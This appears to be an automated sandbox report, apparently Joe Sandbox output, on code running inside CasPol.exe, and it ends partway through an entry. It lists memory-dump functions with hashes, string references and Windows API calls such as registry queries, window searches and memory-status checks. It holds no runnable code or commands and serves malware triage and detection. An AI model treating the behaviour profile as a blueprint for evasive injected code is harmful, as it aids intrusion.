Instruction Fuzzy Hash: 34F0C231604418FFC7029BA5CD0099EBBA8EF06250B2140AAF840FB210D678DE019BA9

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: CasPol.exePID: 4372, Parent PID: 8772COMMON

Execution Graph

Execution Coverage:	15.5%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0.6%
Total number of Nodes:	1130
Total number of Limit Nodes:	53

Executed Functions

Function 012A37D8 Relevance: 9.7, Strings: 7, Instructions: 919COMMON

Download Yara Rule

Strings

(ok, xrefs: 012A38D1
(ok, xrefs: 012A3CE7
(ok, xrefs: 012A3CF7
(ok, xrefs: 012A3816
(ok, xrefs: 012A38FD
(ok, xrefs: 012A399A
(ok, xrefs: 012A3DA9

Memory Dump Source

Source File: 00000004.00000002.5722980483.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_12a0000_CasPol.jbxd

Similarity

API ID:
String ID: (ok$(ok$(ok$(ok$(ok$(ok$(ok
API String ID: 0-1422397375
Opcode ID: 0e6d126912f57803845c6fb309c5e603440bbcbe4a03a40417c58e8164ac9c84
Instruction ID: c7d63dc13eb1e68dcb985706a746e1d07bdb85091de17d2db6372200317eef86
Opcode Fuzzy Hash: 0e6d126912f57803845c6fb309c5e603440bbcbe4a03a40417c58e8164ac9c84
Instruction Fuzzy Hash: F5829C31A1024ACFCB15DF68C984AAEBBF2FF88314F698559E606DB261D770EC41CB51

Uniqueness

Uniqueness Score: -1.00%

Function 012AF950 Relevance: 6.6, Strings: 5, Instructions: 326
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

\, xrefs: 012AFAB9
\, xrefs: 012AFB74
\, xrefs: 012AF9E9
\, xrefs: 012AFBAF
LRk, xrefs: 012AF98F

Memory Dump Source

Source File: 00000004.00000002.5722980483.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_12a0000_CasPol.jbxd

Similarity

API ID:
String ID: LRk$\$\$\$\
API String ID: 0-2704870732
Opcode ID: 37b6e92b6442b99a33c97437fed826e942e338604023d3426b81191c0911466a
Instruction ID: 49ebfce4542065af9dcd5d2e81a84b6dad162ca14733e0b1388b9a029ebf7071
Opcode Fuzzy Hash: 37b6e92b6442b99a33c97437fed826e942e338604023d3426b81191c0911466a
Instruction Fuzzy Hash: 53B12831B102158FCB14DB7CCA916BEB7F2AF88310F558929DA16DB391EB78DC068791

Uniqueness

Uniqueness Score: -1.00%

Function 012A2A98 Relevance: 4.6, Strings: 3, Instructions: 897COMMON

Download Yara Rule

Strings

(ok, xrefs: 012A32FA
(ok, xrefs: 012A2FC2
(ok, xrefs: 012A3308

Memory Dump Source

Source File: 00000004.00000002.5722980483.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_12a0000_CasPol.jbxd

Similarity

API ID:
String ID: (ok$(ok$(ok
API String ID: 0-4197759848
Opcode ID: 3ac55717253e4987f59e3bbbc6acc8c178746eeda0e493337a114bd556c82c14
Instruction ID: ebb42f64d4fd1e45b9f60aebb215cc325a24e967563ec264d607024a89652ed6
Opcode Fuzzy Hash: 3ac55717253e4987f59e3bbbc6acc8c178746eeda0e493337a114bd556c82c14
Instruction Fuzzy Hash: 71729E70A10119DFDB15CFA8C984AAEBBB6FF88304F558069EA05EB361DB35DC41CB91

Uniqueness

Uniqueness Score: -1.00%

Function 20AD8B90 Relevance: 2.1, APIs: 1, Instructions: 608COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.5763085504.0000000020AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 20AD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_20ad0000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 234a016b0b3e361b1dba4f172c15224c6a79fd2a427e47effdca2413f36730b8
Instruction ID: f8067fe03480b7eec4123b02e163b09b9bdcfff1980f06d3d657e775f281b653
Opcode Fuzzy Hash: 234a016b0b3e361b1dba4f172c15224c6a79fd2a427e47effdca2413f36730b8
Instruction Fuzzy Hash: 81229935B042148FDB04DBB4C4946AEB7F2BF89304F958469D906EB3A5EB39DD06CB81

Uniqueness

Uniqueness Score: -1.00%

Function 21295860 Relevance: 1.9, APIs: 1, Instructions: 396COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.5765500911.0000000021290000.00000040.00000800.00020000.00000000.sdmp, Offset: 21290000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_21290000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6823003129731fe6d963eb2d7af14fb380b851b169d237f1929a74a6f40518ee
Instruction ID: 1d1fd057beefe196e15225501d6051175ede8ba9ce1681f0c8de764ea7796b25
Opcode Fuzzy Hash: 6823003129731fe6d963eb2d7af14fb380b851b169d237f1929a74a6f40518ee
Instruction Fuzzy Hash: 95F15E30A00319CFEB04CFA9C988B9DBBF5BF49314F25815AE505AF295DB74A946CF90

Uniqueness

Uniqueness Score: -1.00%

Function 012AB5E8 Relevance: .3, Instructions: 315COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.5722980483.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_12a0000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1202a9b0eaa7c683819b3f0991b0e66c4b68ddbc195ddaf25b9f82fb8897df53
Instruction ID: 54e643031befddc9924cf4dea63c52fcc6050854c698aaae7b8e10fe7a102a93
Opcode Fuzzy Hash: 1202a9b0eaa7c683819b3f0991b0e66c4b68ddbc195ddaf25b9f82fb8897df53
Instruction Fuzzy Hash: 29B18C35A102198FCB14DFB8C4886AEBBF2FF89314F598429E606E7391DB359D42CB51

Uniqueness

Uniqueness Score: -1.00%

Function 1DA10C40 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.5750913183.000000001DA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 1DA10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1da10000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 49fc184247f8d1487a1291fd172545a88bc5b8407fecf45dd3ef08e49e3a8cf3
Instruction ID: 07facfb24c0c8ca53daf78aad34ab9d41aea93dca151d9ffbdf3953f84ad962d
Opcode Fuzzy Hash: 49fc184247f8d1487a1291fd172545a88bc5b8407fecf45dd3ef08e49e3a8cf3
Instruction Fuzzy Hash: A6D06771105290CFD7092BA4DE8D6593F74FF5636230A54A2E159CA066DB330824EB21

Uniqueness

Uniqueness Score: -1.00%

Function 20ADEAC1 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 172
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 20ADEB7F

Strings

LRk, xrefs: 20ADEC1A
LRk, xrefs: 20ADEBB6

Memory Dump Source

Source File: 00000004.00000002.5763085504.0000000020AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 20AD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_20ad0000_CasPol.jbxd

Similarity

API ID: InitializeThunk
String ID: LRk$LRk
API String ID: 2994545307-3442965990
Opcode ID: 5f3f766a18a512507b7178201e007638ba74c23e8281d2e798cfab63d5d8d999
Instruction ID: 1ad0b87116ac02823c70d8a2d7ff876e8bd44855f3e82bf611924adad45f41b0
Opcode Fuzzy Hash: 5f3f766a18a512507b7178201e007638ba74c23e8281d2e798cfab63d5d8d999
Instruction Fuzzy Hash: 3351E331B042089FCB04EBF4C895AEE77F6BF85204F55856AD502DB392EB71E905C792

Uniqueness

Uniqueness Score: -1.00%

Function 20ADEB20 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 148
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 20ADEB7F

Strings

LRk, xrefs: 20ADEC1A
LRk, xrefs: 20ADEBB6

Memory Dump Source

Source File: 00000004.00000002.5763085504.0000000020AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 20AD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_20ad0000_CasPol.jbxd

Similarity

API ID: InitializeThunk
String ID: LRk$LRk
API String ID: 2994545307-3442965990
Opcode ID: 6714be14fd7553073d5b6f68d3a2dd5a6984491e126d78dff97a2a858ecc540d
Instruction ID: 5891bb3d9c3f2dfc69198c3425ed8d7aae26e07ccd865498f53d25ce3b010e76
Opcode Fuzzy Hash: 6714be14fd7553073d5b6f68d3a2dd5a6984491e126d78dff97a2a858ecc540d
Instruction Fuzzy Hash: 4A518031B002199FCB04EBF4C485AEEB7F6BF85204B558969E502AB351EF71E905CB92

Uniqueness

Uniqueness Score: -1.00%

Function 20AC1230 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 128
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

lO5 , xrefs: 20AC12D3

Memory Dump Source

Source File: 00000004.00000002.5762969691.0000000020AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 20AC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_20ac0000_CasPol.jbxd

Similarity

API ID:
String ID: lO5
API String ID: 0-2989342500
Opcode ID: 7353bad71eec563ea6b8289b5aa64b97cf15c54035acee35ff80238439d89f22
Instruction ID: 03f3a119e0d6697161bb005f6bc60221cde41ccb68db05d16f3061cd2b6b8f1e
Opcode Fuzzy Hash: 7353bad71eec563ea6b8289b5aa64b97cf15c54035acee35ff80238439d89f22
Instruction Fuzzy Hash: 8B412472E083958FCB04CFB5C41479EBFB1AF8A210F06856AD544E7391DB749844CBE2

Uniqueness

Uniqueness Score: -1.00%

Function 20AD7DAC Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 117
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegOpenKeyExW.KERNEL32(80000001,00000000,?,00000001,?), ref: 20AD7EB4

Strings

0=5 , xrefs: 20AD7E58

Memory Dump Source

Source File: 00000004.00000002.5763085504.0000000020AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 20AD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_20ad0000_CasPol.jbxd

Similarity

API ID: Open
String ID: 0=5
API String ID: 71445658-1686352640
Opcode ID: eff1d187ef5f473286050984c8a9d9397e8b30a6775dfece61ffd131f9cc0654
Instruction ID: 7c0a5080c3ee8a9b7180238a27134637c7447da78c41498736a0d8f1fc1f7b94
Opcode Fuzzy Hash: eff1d187ef5f473286050984c8a9d9397e8b30a6775dfece61ffd131f9cc0654
Instruction Fuzzy Hash: B94186B19053888FDB04CFA8C588A8EFFF1BF49304F6581AAE449AB341D7749C45CB90

Uniqueness

Uniqueness Score: -1.00%

Function 20AD6550 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 88
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegQueryValueExW.KERNEL32(00000000,00000000,?,?,00000000,?,?,?,?,00000000,?,?,20AD7C03,00000100,00000000,?), ref: 20AD8171

Strings

$<5 , xrefs: 20AD6550

Memory Dump Source

Source File: 00000004.00000002.5763085504.0000000020AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 20AD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_20ad0000_CasPol.jbxd

Similarity

API ID: QueryValue
String ID: $<5
API String ID: 3660427363-3124369919
Opcode ID: 70839e8513a2da8686bb8dd2cfee15c923d38af20d2847bb7c335340917036a0
Instruction ID: 173433a65fb668645623f83bff49c2de2b7792bf8ca0eda52201dab31a076cf2
Opcode Fuzzy Hash: 70839e8513a2da8686bb8dd2cfee15c923d38af20d2847bb7c335340917036a0
Instruction Fuzzy Hash: 9631E1B1D012589FCB10CFDAC884A8EFBF5BF48700F54852AE818AB314D774A909CF91

Uniqueness

Uniqueness Score: -1.00%

Function 20AD6544 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 83
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegOpenKeyExW.KERNEL32(80000001,00000000,?,00000001,?), ref: 20AD7EB4

Strings

0=5 , xrefs: 20AD7E58

Memory Dump Source

Source File: 00000004.00000002.5763085504.0000000020AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 20AD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_20ad0000_CasPol.jbxd

Similarity

API ID: Open
String ID: 0=5
API String ID: 71445658-1686352640
Opcode ID: 0bed74c0b2efecbb78ec8a0fa37d6f745ae7408ab3a84e88f7750d904c62001c
Instruction ID: 354a07783a6820dcae60f27d86a23aa1529656ccd1d6dfc1080ad4b641b0918b
Opcode Fuzzy Hash: 0bed74c0b2efecbb78ec8a0fa37d6f745ae7408ab3a84e88f7750d904c62001c
Instruction Fuzzy Hash: 5E3110B2D012498FDB14CFA9C584A8EFFF1BF48304F64856AE808AB341D7759944CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 012A48B0 Relevance: 3.3, Strings: 2, Instructions: 806
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$k, xrefs: 012A53F7
$k, xrefs: 012A53D4

Memory Dump Source

Source File: 00000004.00000002.5722980483.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_12a0000_CasPol.jbxd

Similarity

API ID:
String ID: $k$$k
API String ID: 0-2008463310
Opcode ID: 26d82aa702918a464fa03742ab35b93b29c3473720e1b929c8c3ed3963ce34c2
Instruction ID: 04651514357dc0f99452113e3910750030757e634e0e023987a6d79a4c33fbda
Opcode Fuzzy Hash: 26d82aa702918a464fa03742ab35b93b29c3473720e1b929c8c3ed3963ce34c2
Instruction Fuzzy Hash: 11627234A041188FDB54DFA4C850B9EBBB6EF88304F5580ADD2066B794DF349D56CFA2

Uniqueness

Uniqueness Score: -1.00%

Function 20ACE558 Relevance: 1.7, APIs: 1, Instructions: 198COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.5762969691.0000000020AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 20AC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_20ac0000_CasPol.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 09e6e411189b9db2087cb628510bcdfa300727fbb9daf614004e46e3268bc396
Instruction ID: d353b2277605ba29ff98971f79808b31bd2abab4cd67c194979e67ca9b74c962
Opcode Fuzzy Hash: 09e6e411189b9db2087cb628510bcdfa300727fbb9daf614004e46e3268bc396
Instruction Fuzzy Hash: 3F814670A10B058FD724CFA9C18179ABBF1FF88204F41892ED58AD7B50DB75E945CB91

Uniqueness

Uniqueness Score: -1.00%

Function 2129088C Relevance: 1.6, APIs: 1, Instructions: 118COMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 212909AA

Memory Dump Source

Source File: 00000004.00000002.5765500911.0000000021290000.00000040.00000800.00020000.00000000.sdmp, Offset: 21290000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_21290000_CasPol.jbxd

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: 98338717f9efe703db3201032d2344397e6a2b2771439959fb723403c2b61916
Instruction ID: 3d1030b64e590ee141944e15bc7a16b2f781b4498741f598253d3d20c2c06a29
Opcode Fuzzy Hash: 98338717f9efe703db3201032d2344397e6a2b2771439959fb723403c2b61916
Instruction Fuzzy Hash: 5051B3B1D10209DFEB14CF99C884ADDBFB5FF48310F20812AE919AB250D7749945CF94

Uniqueness

Uniqueness Score: -1.00%

Function 21290898 Relevance: 1.6, APIs: 1, Instructions: 113COMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 212909AA

Memory Dump Source

Source File: 00000004.00000002.5765500911.0000000021290000.00000040.00000800.00020000.00000000.sdmp, Offset: 21290000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_21290000_CasPol.jbxd

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: da2d4ff4bed3b8b6d918bf6590a638f5047fa2dbebb91f7f1116ea8db2580fd2
Instruction ID: 0492b71a6c7d042d53d2a5bdd9b72292c94e00a447fe466644b0174b328eaa80
Opcode Fuzzy Hash: da2d4ff4bed3b8b6d918bf6590a638f5047fa2dbebb91f7f1116ea8db2580fd2
Instruction Fuzzy Hash: 2841C2B1D1030DDFEB14CF99C884ADEBBB5BF48310F20812AE918AB250D774A945CF95

Uniqueness

Uniqueness Score: -1.00%

Function 20AD8068 Relevance: 1.6, APIs: 1, Instructions: 111registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.KERNEL32(00000000,00000000,?,?,00000000,?,?,?,?,00000000,?,?,20AD7C03,00000100,00000000,?), ref: 20AD8171

Memory Dump Source

Source File: 00000004.00000002.5763085504.0000000020AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 20AD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_20ad0000_CasPol.jbxd

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: 5a8ebc2d425352debba32b2ae521e831b66d25c02c9ae8986967bdaa45470bc6
Instruction ID: 72ae56997f43d56d93d9b8cc6d81540a337f2d9fe8292f5b65dc0765510619ff
Opcode Fuzzy Hash: 5a8ebc2d425352debba32b2ae521e831b66d25c02c9ae8986967bdaa45470bc6
Instruction Fuzzy Hash: 994158B1D01258DFCB10CFE9C984A8EBBF5BF48700F55856AE918AB351D7709909CF91

Uniqueness

Uniqueness Score: -1.00%

Function 2129180C Relevance: 1.6, APIs: 1, Instructions: 97COMMON

Download Yara Rule

APIs

CallWindowProcW.USER32(?,?,?,?,?), ref: 21293091

Memory Dump Source

Source File: 00000004.00000002.5765500911.0000000021290000.00000040.00000800.00020000.00000000.sdmp, Offset: 21290000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_21290000_CasPol.jbxd

Similarity

API ID: CallProcWindow
String ID:
API String ID: 2714655100-0
Opcode ID: ff1a082235c8bf5ed074fd5a6ef30630f4e8efa5cf248be36465bfcf7ace318f
Instruction ID: 099d3aaf0c0d89301c7bbfd69a7baa737acc8f281000e8f20f8795932cf52d8a
Opcode Fuzzy Hash: ff1a082235c8bf5ed074fd5a6ef30630f4e8efa5cf248be36465bfcf7ace318f
Instruction Fuzzy Hash: A44126B4A002098FCB14CF99C889B9BBBF5FF89314F25845DE519AB321D775A940CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 20AC61D0 Relevance: 1.6, APIs: 1, Instructions: 65COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 20AC625F

Memory Dump Source

Source File: 00000004.00000002.5762969691.0000000020AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 20AC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_20ac0000_CasPol.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 3de20e4dc7cf2a287ddadbe99ac4a731cf480ba1e1ade0a458a2bd8cc544b82c
Instruction ID: bafd61418a2a8c4353d0f35921bd9f89236c5921556071c0ff0d462d418b9c5d
Opcode Fuzzy Hash: 3de20e4dc7cf2a287ddadbe99ac4a731cf480ba1e1ade0a458a2bd8cc544b82c
Instruction Fuzzy Hash: 2621DFB5D01208AFDB10CFA9D884AEEBBF4FB48310F14841AE954A3350D378AA50CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 20AC9D2F Relevance: 1.6, APIs: 1, Instructions: 64COMMON

Download Yara Rule

APIs

FindWindowW.USER32(00000000,00000000), ref: 20ACB526

Memory Dump Source

Source File: 00000004.00000002.5762969691.0000000020AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 20AC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_20ac0000_CasPol.jbxd

Similarity

API ID: FindWindow
String ID:
API String ID: 134000473-0
Opcode ID: 965d00a7fca0b327ca57707c8d9710c09f385ad4e5b733b6b0b0746df212c95f
Instruction ID: 513537a8f5a0b085566604fd9e0bad5ba0d5c09dee307c3dc4b6adb782d6d734
Opcode Fuzzy Hash: 965d00a7fca0b327ca57707c8d9710c09f385ad4e5b733b6b0b0746df212c95f
Instruction Fuzzy Hash: 3B2162B18122098FCB00CF9AD884BDEFBB4FF89310F12812ED419AB201C375A900CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 20AC61D8 Relevance: 1.6, APIs: 1, Instructions: 62COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 20AC625F

Memory Dump Source

Source File: 00000004.00000002.5762969691.0000000020AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 20AC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_20ac0000_CasPol.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 9bf499329e6327440b35903c40a3ae2b196c475baa4d4263ca66cbe544dabb3b
Instruction ID: 58cdb0531a764452e9f080660e906baae2ec1a33914bc39de077b46dccbfaac2
Opcode Fuzzy Hash: 9bf499329e6327440b35903c40a3ae2b196c475baa4d4263ca66cbe544dabb3b
Instruction Fuzzy Hash: AC21E0B5D01208AFDB10CFAAD884ADEFBF4EB48310F14841AE954A3350D378A940CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 20ACB4A8 Relevance: 1.6, APIs: 1, Instructions: 58COMMON

Download Yara Rule

APIs

FindWindowW.USER32(00000000,00000000), ref: 20ACB526

Memory Dump Source

Source File: 00000004.00000002.5762969691.0000000020AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 20AC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_20ac0000_CasPol.jbxd

Similarity

API ID: FindWindow
String ID:
API String ID: 134000473-0
Opcode ID: 6832be7c527451da2cd9dd0dc19353077329388b211c5ed49c1cfeb385573bee
Instruction ID: 0c4cad52bf44fb09f6c78e0496256c6b25349aeaca0ca950a46042e4be3c8be4
Opcode Fuzzy Hash: 6832be7c527451da2cd9dd0dc19353077329388b211c5ed49c1cfeb385573bee
Instruction Fuzzy Hash: 4121F0B5C122098ECB14CF9AD484BEEFBB4BF89314F51852ED859B7241C375AA44CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 20AC9D3C Relevance: 1.6, APIs: 1, Instructions: 57COMMON

Download Yara Rule

APIs

FindWindowW.USER32(00000000,00000000), ref: 20ACB526

Memory Dump Source

Source File: 00000004.00000002.5762969691.0000000020AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 20AC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_20ac0000_CasPol.jbxd

Similarity

API ID: FindWindow
String ID:
API String ID: 134000473-0
Opcode ID: 0102456fa80c5bedd8b0a646a38044a033ca8bba9d5b82c3adb06bedac6d27c3
Instruction ID: 523593bce57c68ee43de6872de465bc9ddd839f0b3461b6f692f7758d48930cb
Opcode Fuzzy Hash: 0102456fa80c5bedd8b0a646a38044a033ca8bba9d5b82c3adb06bedac6d27c3
Instruction Fuzzy Hash: BA213FB58122098FCB10CF9AD884B9EFBB4BB49310F51852ED919B7200D375A904CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 20AC0AB4 Relevance: 1.6, APIs: 1, Instructions: 55COMMON

Download Yara Rule

APIs

GlobalMemoryStatusEx.KERNEL32(?,?,?,?,?,?,?,?,?,20AC1282), ref: 20AC136F

Memory Dump Source

Source File: 00000004.00000002.5762969691.0000000020AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 20AC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_20ac0000_CasPol.jbxd

Similarity

API ID: GlobalMemoryStatus
String ID:
API String ID: 1890195054-0
Opcode ID: 26f9c6e419ca439467cf14271bb427a58012ea50752702ded95a05fb8c9ff561
Instruction ID: b7d8330e002968d2d8756ed44077a903db81ecfbb4ca173a8ec6b67029ac8c3a
Opcode Fuzzy Hash: 26f9c6e419ca439467cf14271bb427a58012ea50752702ded95a05fb8c9ff561
Instruction Fuzzy Hash: 891114B1D006599BCB10CF9AC544BDEFBF4AF49224F11816AD918B7740D778A940CFE1

Uniqueness

Uniqueness Score: -1.00%

Function 20ACE9A8 Relevance: 1.6, APIs: 1, Instructions: 54libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000000,?,?), ref: 20ACEA1A

Memory Dump Source

Source File: 00000004.00000002.5762969691.0000000020AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 20AC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_20ac0000_CasPol.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 001e5aee42915f93c735e6bff6a0ad17b7a3d60f1c777d38726714eecefee89c
Instruction ID: 8c1e9294ffe17c7f24bd2311746b6f6a994003114b97bbe85235cf65322d11ea
Opcode Fuzzy Hash: 001e5aee42915f93c735e6bff6a0ad17b7a3d60f1c777d38726714eecefee89c
Instruction Fuzzy Hash: 9211F2B69002498FDB10CF9AD444BDEFBF4BB88310F01852ED959A7200C375A945CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 20AC1300 Relevance: 1.6, APIs: 1, Instructions: 53COMMON

Download Yara Rule

APIs

GlobalMemoryStatusEx.KERNEL32(?,?,?,?,?,?,?,?,?,20AC1282), ref: 20AC136F

Memory Dump Source

Source File: 00000004.00000002.5762969691.0000000020AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 20AC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_20ac0000_CasPol.jbxd

Similarity

API ID: GlobalMemoryStatus
String ID:
API String ID: 1890195054-0
Opcode ID: 6f559a2dcdf6b38964ac12f900a33c09063f217b1f8eaaf46727f4b017f5aa9d
Instruction ID: d040b1523e766481c372a1547ccbb587cf5911587c9ab5f0ea6adda16d4b3ce1
Opcode Fuzzy Hash: 6f559a2dcdf6b38964ac12f900a33c09063f217b1f8eaaf46727f4b017f5aa9d
Instruction Fuzzy Hash: D61133B2D002599BCB00CFAAC444BDEFBB0AF49224F01812AD918A7340D378A940CFE2

Uniqueness

Uniqueness Score: -1.00%

Function 20ACE9B0 Relevance: 1.6, APIs: 1, Instructions: 52libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000000,?,?), ref: 20ACEA1A

Memory Dump Source

Source File: 00000004.00000002.5762969691.0000000020AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 20AC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_20ac0000_CasPol.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 4541b6d73440d39bf70c89bbe503fafc147d5e8b51962752a82a1bc15b177ca5
Instruction ID: e4aa0028c5892977528a1aee94178cd62b435f4a4b150fef86ed5d8c1fd0ff4d
Opcode Fuzzy Hash: 4541b6d73440d39bf70c89bbe503fafc147d5e8b51962752a82a1bc15b177ca5
Instruction Fuzzy Hash: 1B11D0B69002499FDB10CFAAC844B9EFBF4AB88310F11852AD959A7240C378A944CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 20AD9160 Relevance: 1.6, APIs: 1, Instructions: 52libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 20AD91A1

Memory Dump Source

Source File: 00000004.00000002.5763085504.0000000020AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 20AD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_20ad0000_CasPol.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 00519637f3acd0ee6206cc7083f3640aba86310cb0a13eda9ac5896f1b25a989
Instruction ID: 649d292981ddda5b9a2325321ca82016b01cbad2c5324c4fd3a3bcb8179cc291
Opcode Fuzzy Hash: 00519637f3acd0ee6206cc7083f3640aba86310cb0a13eda9ac5896f1b25a989
Instruction Fuzzy Hash: 16112B71A05219DFCB14DFA4C498A9EBBB2FF49304F51882CE401AB394DB76E945CF91

Uniqueness

Uniqueness Score: -1.00%

Function 20ACD4EC Relevance: 1.6, APIs: 1, Instructions: 50COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,?,?,?,?,?,20ACE574), ref: 20ACE7AE

Memory Dump Source

Source File: 00000004.00000002.5762969691.0000000020AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 20AC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_20ac0000_CasPol.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
